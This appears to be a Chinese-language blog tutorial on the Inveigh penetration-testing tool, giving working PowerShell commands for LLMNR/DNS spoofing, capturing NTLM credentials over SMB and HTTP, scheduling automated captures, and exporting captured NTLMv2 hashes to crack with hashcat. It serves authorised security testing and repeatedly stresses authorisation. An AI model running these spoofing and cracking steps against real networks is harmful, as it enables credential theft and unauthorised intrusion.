首页
/ 5个步骤掌握Inveigh:跨平台安全测试指南

5个步骤掌握Inveigh:跨平台安全测试指南

2026-04-25 10:11:13作者:董斯意

Inveigh是一款基于.NET开发的跨平台网络安全工具,专为渗透测试人员设计,可在IPv4和IPv6环境下执行网络协议分析与安全评估。作为网络安全工具领域的瑞士军刀,它集成了多种协议监听与响应功能,帮助安全工程师在渗透测试实战中快速识别网络漏洞,强化防御体系。

如何快速上手Inveigh?

环境准备

首先通过以下命令克隆项目仓库并进入工作目录:

git clone https://gitcode.com/gh_mirrors/in/Inveigh  # 克隆项目代码
cd Inveigh                                         # 进入项目根目录

基础启动命令

Import-Module .\Inveigh.psd1; Invoke-Inveigh  # 加载模块并启动默认配置

💡 新手提示:首次运行需以管理员权限启动PowerShell,确保网络监听权限。

核心功能卡片

功能模块 作用说明 应用场景
LLMNR监听 捕获链路本地多播名称解析请求 内网主机发现
DNS欺骗 响应伪造DNS查询 钓鱼攻击模拟
SMB捕获 记录NTLM挑战/响应 凭证分析与安全审计
HTTP监听 收集Web认证信息 Web应用渗透测试

📌 重点总结:Inveigh通过模拟合法服务响应,帮助安全测试人员评估网络设备的认证机制安全性,所有操作需在授权环境下进行。

核心配置的5个技巧

参数速查表

参数类别 关键参数 作用说明
网络设置 -IP 192.168.1.10 指定监听IP地址
协议控制 -LLMNR Y -NBNS N 启用LLMNR禁用NBNS
输出管理 -FileOutput Y -FileOutputDirectory ./logs 保存日志到指定目录
认证配置 -HTTPAuth NTLM 设置HTTP认证类型
高级过滤 -SpooferIPsIgnore 10.0.0.0/8 忽略特定网段请求

实用配置示例

# 仅监听LLMNR并记录结果到文件
Invoke-Inveigh -IP 192.168.1.10 -LLMNR Y -NBNS N -FileOutput Y -FileOutputDirectory ./capture_logs

🔧 配置技巧:使用-Inspect参数可进入流量分析模式,仅监听不响应,适合初步网络探测。

📌 重点总结:合理组合参数可精确控制工具行为,避免对生产环境造成意外影响。建议先在测试环境验证配置效果。

高级应用的2个实战方案

方案1:企业内网安全评估

# 多协议协同监听配置
Invoke-Inveigh -IP 10.1.0.5 -DNS Y -LLMNR Y -HTTP Y -SMB Y `
  -SpooferThresholdNetwork 3 -ConsoleOutput Medium

💡 进阶技巧-SpooferThresholdNetwork 3设置仅对3个以上主机请求的域名进行响应,减少误报。

方案2:自动化测试脚本

创建Inveigh-Auto.ps1实现定时任务:

$runTime = 60  # 运行60分钟
$outputDir = ".\daily_scan_$(Get-Date -Format yyyyMMdd)"
New-Item -ItemType Directory -Path $outputDir | Out-Null

Invoke-Inveigh -RunTime $runTime -FileOutput Y `
  -FileOutputDirectory $outputDir -SpooferLearning Y

📌 重点总结:高级应用需结合具体测试目标调整参数,建议配合Wireshark等工具进行流量联动分析。

新手常见陷阱及解决方案

陷阱1:权限不足导致监听失败

❌ 错误提示:无法绑定到端口5355
✅ 解决方案:以管理员身份运行PowerShell,或使用-Elevated Y参数强制权限检查

陷阱2:证书问题导致HTTPS功能异常

❌ 现象:HTTPS监听启动后无法捕获流量
✅ 解决方案:使用-HTTPSForceCertDelete Y参数清除残留证书,重新生成自签名证书

陷阱3:日志文件权限问题

❌ 错误:无法写入日志文件
✅ 解决方案:确保输出目录存在且有写入权限,或使用-FileOutputDirectory指定可写路径

📌 重点总结:遇到问题先检查系统事件日志和Inveigh输出日志,大部分权限问题可通过管理员模式解决。

如何扩展Inveigh的测试能力?

协议扩展

通过修改Listeners目录下的协议处理类(如DNSListener.cs)添加自定义协议支持,实现对特定工业协议的安全测试。

集成第三方工具

结合hashcat进行凭证破解:

# 将捕获的NTLMv2哈希导出到hashcat格式
Get-Content ./Inveigh-NTLMv2.txt | Select-Object -Skip 1 | ForEach-Object {
  $parts = $_.Split('|')
  "$($parts[3]):$($parts[4]):$($parts[5]):$($parts[6])"
} | Out-File -Encoding ASCII ./hashcat_input.txt

# 使用hashcat破解
hashcat -m 5600 ./hashcat_input.txt ./wordlist.txt

📌 重点总结:Inveigh的模块化设计使其具备良好扩展性,通过二次开发可适配特定场景的安全测试需求。

通过以上五个步骤,您已掌握Inveigh的核心功能与实战技巧。作为跨平台安全测试工具,它不仅能帮助发现网络中的认证漏洞,更能提升安全团队对企业内网的风险认知。始终记住:所有测试必须获得明确授权,遵守网络安全相关法律法规。

登录后查看全文
热门项目推荐
相关项目推荐